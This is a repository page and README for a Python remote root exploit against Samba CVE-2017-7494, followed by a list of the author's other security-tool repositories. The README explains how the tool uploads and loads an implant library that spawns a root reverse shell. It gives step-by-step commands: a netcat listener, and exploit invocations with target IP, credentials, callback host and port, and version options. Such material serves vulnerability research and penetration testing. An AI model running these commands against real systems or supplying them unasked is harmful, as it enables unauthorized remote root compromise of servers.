• This repository has been archived on 20/Apr/2022
  • Stars
    star
    256
  • Rank 159,219 (Top 4 %)
  • Language
    Python
  • License
    GNU General Publi...
  • Created over 7 years ago
  • Updated almost 4 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Remote root exploit for the SAMBA CVE-2017-7494 vulnerability

CVE-2017-7494

Remote root exploit for the SAMBA CVE-2017-7494 vulnerability.

Details

This exploit is divided in 2 parts:

  • First, it compiles a payload called "implant.c" and generates a library (libimplantx32.so or libimplantx64.so) that changes to the root user, detaches from the parent process and spawns a reverse shell.
  • Second, it finds a writeable share in the specified target host, uploads the library with a random name and tries to load it.

As long as the target is vulnerable and the payload is the correct for the target operating system and architecture, the exploit is 100% reliable.

How to

In your machine, run the following command:

$ nc -p 31337 -l

Then, run the exploit against your target and wait until it connects back to your Netcat:

$ python cve_2017_7494.py -t target_ip

If you close too fast the reverse shell, instead of running again the exploit uploading the module, etc... you can just pass the path to the module it already uploaded. Supposing it was uploaded to /shared/directory/ as "module.so", you would run a command like the following one:

$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so

UPDATE 11/25/2017 - Archivaldo

You can now run the exploit again samba 3.5.0 and 3.6.0, you just need add the argument -o 1

python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1 

You can now use your own custom .so

python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so

In case you need to run this script from a x86 machine, compiling the implant binaries will create two x86 files. Using the flag -n 1 you can disable compilation and copy libimplantx64.so from another machine.

python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

In case samba runs just on port 139. You can set the remote server port using the argument -p

python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

NOTES

I do not support it anymore.

-- Joxean Koret

More Repositories

1

diaphora

Diaphora, the most advanced Free and Open Source program diffing tool.
Python
3,639
star
2

pigaios

A tool for matching and diffing source codes directly against binaries.
Python
635
star
3

pyew

Official repository for Pyew.
Python
383
star
4

nightmare

A distributed fuzzing testing suite with web administration
Python
371
star
5

multiav

MultiAV scanner with Python and JSON API. Disclaimer: I don't maintain it any more.
Python
312
star
6

idamagicstrings

An IDA Python script to extract information from string constants.
Python
304
star
7

cosa-nostra

Cosa Nostra, a FOSS graph based malware clusterization toolkit.
Python
227
star
8

membugtool

A DBI tool to discover heap memory related bugs
C++
125
star
9

maltindex

Mal Tindex is an Open Source tool for indexing binaries and help attributing malware campaigns
Python
66
star
10

tahh

Source codes for "The Antivirus Hackers Handbook" book.
Python
58
star
11

mynav

Automatically exported from code.google.com/p/mynav
Python
28
star
12

oldidc

IDA Python's idc.py <= 7.3 compatibility module
Python
21
star
13

deeptoad

DeepToad is a library and a tool to clusterize similar files using fuzzy hashing
C
20
star
14

diaphora-ml

Diaphora Machine Learning tools and datasets
Python
18
star
15

ubsnippets

Undefined Behaviour Snippets
17
star
16

pyavast

Python bindings for Avast antivirus server version for Linux
Python
14
star
17

jkutils

My own Python Utility Libraries
Python
11
star
18

pinpack

A PIN Tool to unpack simple write and exec packers (for Linux)
C++
10
star
19

super-irudi

Super Irudi, a command line based tool to enhance photographs.
Python
5
star
20

pigaios-databases

Pigaios SQLite databases
3
star
21

tnsids

Automatically exported from code.google.com/p/tnsids
1
star